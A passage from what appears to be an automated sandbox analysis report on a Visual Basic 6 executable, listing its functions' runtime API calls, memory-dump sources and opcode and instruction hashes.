#525.MSVBVM60(00000000), ref: 004192FE
__vbaStrMove.MSVBVM60 ref: 0041930B
__vbaGet3.MSVBVM60(00000000,0041B1A4,00000000), ref: 0041931C
__vbaGet3.MSVBVM60(00000004,0041B110,00000000), ref: 0041932C
__vbaStrCopy.MSVBVM60 ref: 00419341
#648.MSVBVM60(0000000A), ref: 00419359
__vbaFreeVar.MSVBVM60 ref: 00419368
__vbaStrCat.MSVBVM60(00000000,?), ref: 00419379
__vbaStrMove.MSVBVM60 ref: 00419384
__vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,00000000), ref: 00419396
__vbaFreeStr.MSVBVM60 ref: 0041939F
__vbaGenerateBoundsError.MSVBVM60 ref: 004193C1
__vbaUI1I2.MSVBVM60 ref: 004193CC
__vbaUI1I2.MSVBVM60 ref: 004193F8
__vbaUI1I2.MSVBVM60 ref: 00419402
__vbaExitProc.MSVBVM60 ref: 00419694
__vbaFreeStr.MSVBVM60(004196D8), ref: 004196CB
__vbaFreeStr.MSVBVM60 ref: 004196D0
__vbaFreeStr.MSVBVM60 ref: 004196D5

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Free$Move$Get3$Copy$#516#631BstrFile$#525#648ErrorOpen$#537BoundsCloseExitGenerateListProc
String ID:
API String ID: 3049632819-0
Opcode ID: e3b1f2423bc377d9a5caf306efc6a375a264b61fcf0490b5b8eb9692d819d35f
Instruction ID: 619ad798aab7bc499b7524e0dff90ded30000a5dd3d7a33beffa270327a53f47
Opcode Fuzzy Hash: e3b1f2423bc377d9a5caf306efc6a375a264b61fcf0490b5b8eb9692d819d35f
Instruction Fuzzy Hash: 44D1C472900249EFDB14EFA4DD64ADDBBB6FB48300F10812AE555A72A0DB385CC1CF68

Function 00415D30 Relevance: 64.8, APIs: 43, Instructions: 350COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(6CF8D9F5,00000000,6CF8D83C), ref: 00415DA5
__vbaStrCopy.MSVBVM60 ref: 00415DAD
__vbaOnError.MSVBVM60(00000001), ref: 00415DB1
__vbaStrToAnsi.MSVBVM60(?,?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00415DD0
__vbaSetSystemError.MSVBVM60(00000000), ref: 00415DE1
__vbaStrToUnicode.MSVBVM60(?,?), ref: 00415DEB
__vbaFreeStr.MSVBVM60 ref: 00415DFA
__vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,?), ref: 00415E2D
__vbaSetSystemError.MSVBVM60(?,?,00000006,?,00000000), ref: 00415E43
__vbaSetSystemError.MSVBVM60(?,?,00000010,?,00000000), ref: 00415E59
__vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00415E70
__vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000), ref: 00415E86
__vbaAryLock.MSVBVM60(?,?), ref: 00415E97
__vbaGenerateBoundsError.MSVBVM60 ref: 00415EB4
__vbaGenerateBoundsError.MSVBVM60 ref: 00415EC3
__vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000), ref: 00415EE4
__vbaAryUnlock.MSVBVM60(?), ref: 00415EEA
__vbaSetSystemError.MSVBVM60(?), ref: 00415EF9
__vbaStrToAnsi.MSVBVM60(?,?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 00415F0E
__vbaSetSystemError.MSVBVM60(00000000), ref: 00415F19
__vbaStrToUnicode.MSVBVM60(?,?), ref: 00415F23
__vbaFreeStr.MSVBVM60 ref: 00415F32
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 00415F98
__vbaGenerateBoundsError.MSVBVM60(?,?,?,?,?), ref: 00415FAB
__vbaSetSystemError.MSVBVM60(?,?,?,00000000), ref: 00415FCA
__vbaAryLock.MSVBVM60(?,?), ref: 00415FD4
__vbaGenerateBoundsError.MSVBVM60 ref: 00415FF1
__vbaGenerateBoundsError.MSVBVM60 ref: 00415FF9
__vbaUbound.MSVBVM60(00000001,?,?,00000000), ref: 0041600D
__vbaSetSystemError.MSVBVM60(?,3F800000,00000000), ref: 00416026
__vbaAryUnlock.MSVBVM60(?), ref: 00416032
__vbaAryLock.MSVBVM60(?,?), ref: 0041603C
__vbaGenerateBoundsError.MSVBVM60 ref: 0041605C
__vbaGenerateBoundsError.MSVBVM60 ref: 0041606D
__vbaAryUnlock.MSVBVM60(?,?,?,3F800004,?), ref: 00416095
__vbaSetSystemError.MSVBVM60(?), ref: 004160A5
__vbaExitProc.MSVBVM60 ref: 004160AE
__vbaSetSystemError.MSVBVM60(?,?), ref: 004160D0
__vbaExitProc.MSVBVM60 ref: 004160D9
__vbaFreeStr.MSVBVM60(00416126), ref: 00416103
__vbaRecDestruct.MSVBVM60(00406C9C,?), ref: 0041610E
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041611A
__vbaFreeStr.MSVBVM60 ref: 00416123

Part of subcall function 00416140: __vbaSetSystemError.MSVBVM60(00000000,?,00000006,?,00000000,?,00415E12,?), ref: 00416174

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Error$System$BoundsGenerate$Free$LockUnlock$AnsiCopyDestructExitProcUnicode$RedimUbound
String ID:
API String ID: 2812220623-0
Opcode ID: 57e9575da3c81f2ccb810852609170278bbd2706e9235e0bb030ce107236565a
Instruction ID: e990e7f7e1d036554655f0c5b60a984b82b92affe55a7b322dae047d0808a029
Opcode Fuzzy Hash: 57e9575da3c81f2ccb810852609170278bbd2706e9235e0bb030ce107236565a
Instruction Fuzzy Hash: 40D11B71D00208ABCB04DFE5DD84DEEBBB9FF88700F14851AF506AB254DB75A986CB64

Function 004128B0 Relevance: 61.7, APIs: 41, Instructions: 214COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00000000,004025E6), ref: 004128CE
__vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 004128FB
__vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 0041290A
#648.MSVBVM60(0000000A), ref: 00412929
__vbaFreeVar.MSVBVM60 ref: 00412938
__vbaI2I4.MSVBVM60(?), ref: 0041294C
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041295A
__vbaI2I4.MSVBVM60 ref: 0041296A
#570.MSVBVM60(00000000), ref: 00412971
__vbaLenBstr.MSVBVM60(00404B24), ref: 0041297E
__vbaI2I4.MSVBVM60 ref: 004129B3
__vbaFileSeek.MSVBVM60(00000000,00000000), ref: 004129BE
__vbaI2I4.MSVBVM60 ref: 004129CE
__vbaGet3.MSVBVM60(00000004,?,00000000), ref: 004129DB
__vbaLenBstr.MSVBVM60(00404B24), ref: 004129F9
__vbaLenBstr.MSVBVM60(00404B24), ref: 00412A27
#525.MSVBVM60(00000000), ref: 00412A2E
__vbaStrMove.MSVBVM60 ref: 00412A39
__vbaI2I4.MSVBVM60 ref: 00412A49
__vbaFileSeek.MSVBVM60(00000000,00000000), ref: 00412A54
__vbaI2I4.MSVBVM60 ref: 00412A64
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00412A71

Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3

__vbaStrMove.MSVBVM60(?), ref: 00412A8C
__vbaStrCopy.MSVBVM60 ref: 00412AAA
__vbaStrMove.MSVBVM60(00000003), ref: 00412ABB
#616.MSVBVM60(00000000), ref: 00412AC2
__vbaStrMove.MSVBVM60 ref: 00412ACD

Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117

__vbaStrMove.MSVBVM60(?,00000000), ref: 00412AE2
__vbaStrCmp.MSVBVM60(00000000), ref: 00412AE9
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,00000000), ref: 00412B10

Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E

__vbaStrMove.MSVBVM60(?,?,?,00000000), ref: 00412B36
__vbaStrMove.MSVBVM60(00000004), ref: 00412B57
#618.MSVBVM60(00000000), ref: 00412B5E
__vbaStrMove.MSVBVM60 ref: 00412B69
__vbaI4Str.MSVBVM60(00000000), ref: 00412B70
__vbaFreeStrList.MSVBVM60(00000003,?,?,00000000), ref: 00412B87
__vbaI2I4.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00412B9A
__vbaFileClose.MSVBVM60(00000000), ref: 00412BA1
__vbaFreeStr.MSVBVM60(00412BEA), ref: 00412BDA
__vbaFreeStr.MSVBVM60(?,?,?,?,?,?,00000000), ref: 00412BE3
__vbaErrorOverflow.MSVBVM60 ref: 00412C00

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$FreeMove$BstrFile$#516#631Copy$ErrorGet3ListSeek$#525#537#570#616#618#648ChkstkCloseOpenOverflow
String ID:
API String ID: 277344030-0
Opcode ID: 4fdbd1f00878914f35780159ae431110eecd2a164aeb5ddbb8388ccc6ffa626b
Instruction ID: f355006ae09e1e352358bc31eb7e3acedda410367e126062bc5f553c60d2b707
Opcode Fuzzy Hash: 4fdbd1f00878914f35780159ae431110eecd2a164aeb5ddbb8388ccc6ffa626b
Instruction Fuzzy Hash: D891C8B1D00208EFDB04DFE4DE58BDEBBB4BB48305F208169E612B76A0DB745A45CB58

Function 0040EAB0 Relevance: 54.5, APIs: 29, Strings: 2, Instructions: 255COMMON

Download Yara Rule

APIs

#594.MSVBVM60(?,6CF8D9F5,-00000001,6CF8D8B1), ref: 0040EB1A
__vbaFreeVar.MSVBVM60 ref: 0040EB23
__vbaLenBstr.MSVBVM60 ref: 0040EB2F
#631.MSVBVM60(?,?,0000000A), ref: 0040EB68
__vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
#516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
__vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
__vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92
#593.MSVBVM60(00000002,?,?,?,?,0000000A), ref: 0040EC76
#714.MSVBVM60(?,00000004,00000000,?,?,?,0000000A), ref: 0040ED04
__vbaVarAdd.MSVBVM60(?,?,00000003,?,?,0000000A), ref: 0040ED1C
__vbaI4Var.MSVBVM60(00000000,?,?,0000000A), ref: 0040ED23
__vbaFreeVarList.MSVBVM60(00000004,00000002,00000004,?,?,?,?,0000000A), ref: 0040ED40
#537.MSVBVM60(?,?), ref: 0040ED54
__vbaStrMove.MSVBVM60(?,?), ref: 0040ED65
__vbaStrCat.MSVBVM60(00000000,?,?), ref: 0040ED68
__vbaStrMove.MSVBVM60(?,?), ref: 0040ED73
#537.MSVBVM60(?,00000000,?,?), ref: 0040ED77
__vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040ED82
__vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 0040ED8B
__vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040ED92
#537.MSVBVM60(00000000,00000000,?,00000000,?,?), ref: 0040ED96
__vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040EDA1
__vbaStrCat.MSVBVM60(00000000,?,00000000,?,?), ref: 0040EDA4
__vbaStrMove.MSVBVM60(?,00000000,?,?), ref: 0040EDAB
__vbaFreeStrList.MSVBVM60(00000005,?,?,?,?,?,?,00000000,?,?), ref: 0040EDC3
__vbaStrCopy.MSVBVM60 ref: 0040EDEC
__vbaFreeStr.MSVBVM60(0040EE4E), ref: 0040EE47
__vbaErrorOverflow.MSVBVM60(?,?,0000000A), ref: 0040EE69

Strings

gfff, xrefs: 0040EC7F
gfff, xrefs: 0040EC1D

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Move$Free$#537$List$#516#593#594#631#714BstrCopyErrorOverflow
String ID: gfff$gfff
API String ID: 2397813863-3084402119
Opcode ID: 1859efc3a836bc8348b47109d9ac22472ae7e224be2a5a0a1c78bdaa5bd21b43
Instruction ID: 69a6bd49322be43a13479f126592eb8a048afae0e7896bfb7d302a94b416162a
Opcode Fuzzy Hash: 1859efc3a836bc8348b47109d9ac22472ae7e224be2a5a0a1c78bdaa5bd21b43
Instruction Fuzzy Hash: CD9141B5E00208DBCB08DFB5DD89ADDBBBAEB88341F14453AE505F72A0DB345985CB94

Function 00410780 Relevance: 52.7, APIs: 35, Instructions: 227COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,004093D0,00000000), ref: 0041079E
__vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004107CE
__vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004107DF
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004107EE
__vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041080A
__vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410844
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041085A
__vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410873
#525.MSVBVM60(00000104), ref: 0041089C
__vbaStrMove.MSVBVM60 ref: 004108A7
__vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004108DE
__vbaGenerateBoundsError.MSVBVM60 ref: 0041091D
__vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410938
__vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041095E
__vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041096F
__vbaFreeStr.MSVBVM60(?,00000000), ref: 00410984
#616.MSVBVM60(?,?,?,00000000), ref: 00410999
__vbaStrMove.MSVBVM60(?,00000000), ref: 004109A7
__vbaStrMove.MSVBVM60(?,?,00000000), ref: 004109BE
__vbaFreeStr.MSVBVM60(?,00000000), ref: 004109CA
#517.MSVBVM60(?,?,00000000), ref: 004109DB
__vbaStrMove.MSVBVM60(?,00000000), ref: 004109E9
#517.MSVBVM60(?,00000000,?,00000000), ref: 004109F7
__vbaStrMove.MSVBVM60(?,00000000), ref: 00410A05
__vbaStrCmp.MSVBVM60(00000000,?,00000000), ref: 00410A0C
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410A30
__vbaRecUniToAnsi.MSVBVM60(00404B50,?,?,?,00000000,004025E6), ref: 00410A77
__vbaSetSystemError.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00410A8D
__vbaRecAnsiToUni.MSVBVM60(00404B50,?,?,?,00000000,004025E6), ref: 00410AA6
__vbaSetSystemError.MSVBVM60(?), ref: 00410ACA
__vbaFreeStr.MSVBVM60(00410B37), ref: 00410B03
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 00410B1B
__vbaFreeStr.MSVBVM60 ref: 00410B24
__vbaFreeStr.MSVBVM60 ref: 00410B30

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Error$FreeSystem$AnsiMove$#517$#525#616BoundsChkstkConstruct2CopyDestructGenerateListUnicode
String ID:
API String ID: 3648932012-0
Opcode ID: 87815be6b7c03a5207e36eb47b7e00b3ec7173c49da51aca528be144e1a0b0d3
Instruction ID: cf7582b6c84a3ebcd0dc45819e7631e4fb138bd8fd28df0a43539233d5c0ba2c
Opcode Fuzzy Hash: 87815be6b7c03a5207e36eb47b7e00b3ec7173c49da51aca528be144e1a0b0d3
Instruction Fuzzy Hash: 7FA109B5901219DFDB14DFA0DD48BDEBBB4BF48304F1081AAE50AB72A0DB745A85CF58

Function 0040C700 Relevance: 48.5, APIs: 32, Instructions: 452COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,004025E6), ref: 0040C71E
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040C74E
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000728), ref: 0040C7A1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040563C,0000001C), ref: 0040C7E9
__vbaI2I4.MSVBVM60 ref: 0040C80D
__vbaFreeObj.MSVBVM60 ref: 0040C81A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C884
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00406C48,0000004C), ref: 0040C8B7
__vbaFreeObj.MSVBVM60 ref: 0040C8EF

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$CheckHresult$Free$ChkstkError
String ID:
API String ID: 1728155253-0
Opcode ID: 57bc03b52b3c873fae243cd4aa70e656bc598bd1710269bbbe43208556864782
Instruction ID: 528750ef8f6217dc53c7ee79ba9f07e518e2306c00ab0ecc930209c3b3704f0e
Opcode Fuzzy Hash: 57bc03b52b3c873fae243cd4aa70e656bc598bd1710269bbbe43208556864782
Instruction Fuzzy Hash: BA1229B5900208EFDB14DFA4C988BDEBBB5FF48700F208269E509B7291D7759985CF64

Function 0040EE70 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

__vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
#631.MSVBVM60(?,?,?), ref: 0040EEF8
__vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
#516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
__vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
__vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
#631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
__vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
#516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
__vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
__vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
#631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
__vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
#516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
__vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
__vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
#537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
__vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
__vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
__vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
__vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
__vbaStrCopy.MSVBVM60 ref: 0040F13C
__vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
__vbaErrorOverflow.MSVBVM60(?), ref: 0040F18B

Strings

VUUU, xrefs: 0040EFC9
gfff, xrefs: 0040EF13
VUUU, xrefs: 0040EEB5

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Free$Move$#516#631$#537BstrCopyErrorOverflow
String ID: VUUU$VUUU$gfff
API String ID: 3310697333-2314002932
Opcode ID: 54317dd8e67cb568bc16672bdc0ba9886cd6a0f52f287c8f5b22d9497fb7e9dd
Instruction ID: f629f5cd6c6994accf7ffd4865734aab981d1da92c9f489476db43807f34fb7a
Opcode Fuzzy Hash: 54317dd8e67cb568bc16672bdc0ba9886cd6a0f52f287c8f5b22d9497fb7e9dd
Instruction Fuzzy Hash: FB717771E00105EBC718CFB9DA8959DBF76ABCC341F44413AE805FB6A4DA385D8A8B58

Function 004163E0 Relevance: 46.8, APIs: 31, Instructions: 331COMMON

Download Yara Rule

APIs

__vbaOnError.MSVBVM60(00000001,00000000,6CFB285F,6CFA1654), ref: 00416456
__vbaSetSystemError.MSVBVM60(00000000,00000000,?,00000000), ref: 00416487
__vbaSetSystemError.MSVBVM60(?,?,00000040,?,00000000), ref: 0041649F
__vbaSetSystemError.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 004164C4
__vbaSetSystemError.MSVBVM60(?,?,00000014,?,00000000,?,?,?,00000000,?,?,00000040,?,00000000), ref: 004164D9
__vbaSetSystemError.MSVBVM60(?,?,000000E0,?,00000000,?,?,00000014,?,00000000,?,?,?,00000000,?,?), ref: 004164F4
__vbaRedim.MSVBVM60(00000000,00000028,?,00000000,00000001,00000000,00000000,?,?,000000E0,?,00000000,?,?,00000014,?), ref: 00416513
__vbaAryLock.MSVBVM60(?,?,?,00000000,?,?,00000040,?,00000000), ref: 00416527
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416547
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416567
__vbaSetSystemError.MSVBVM60(?,3F800000,?,?,00000000,?,?,00000040,?,00000000), ref: 00416595
__vbaAryUnlock.MSVBVM60(?,?,?,00000040,?,00000000), ref: 0041659E
__vbaUbound.MSVBVM60(00000001,?,?,?,00000040,?,00000000), ref: 004165B8
__vbaI2I4.MSVBVM60(?,?,00000040,?,00000000), ref: 004165C0
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004165F6
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416606
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416622
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416632
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416665
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416675
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166BD
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166CD
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 004166F3
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416703
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416729
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416739
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416755
__vbaGenerateBoundsError.MSVBVM60(?,?,00000040,?,00000000), ref: 00416762
__vbaExitProc.MSVBVM60(?,?,00000040,?,00000000), ref: 0041678D
__vbaAryDestruct.MSVBVM60(00000000,?,004167B5), ref: 004167AE
__vbaErrorOverflow.MSVBVM60(?,00000000,?,?,00000040,?,00000000), ref: 004167CB

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Error$BoundsGenerate$System$DestructExitLockOverflowProcRedimUboundUnlock
String ID:
API String ID: 2234381736-0
Opcode ID: a464f5ca76685ac84e1fccbaa1c1c20bc3de5b4abe262b6c2715ba6d0aacd5c5
Instruction ID: f2618860313800eaedd81b2e61ad480ccb106d02fda6e258e19164c82fe6daf4
Opcode Fuzzy Hash: a464f5ca76685ac84e1fccbaa1c1c20bc3de5b4abe262b6c2715ba6d0aacd5c5
Instruction Fuzzy Hash: 01C15D719002199BCF14DFA8CA80AEEB7B5FF48304F61459AD419B7280D775ED82CFA5

Function 0040E840 Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

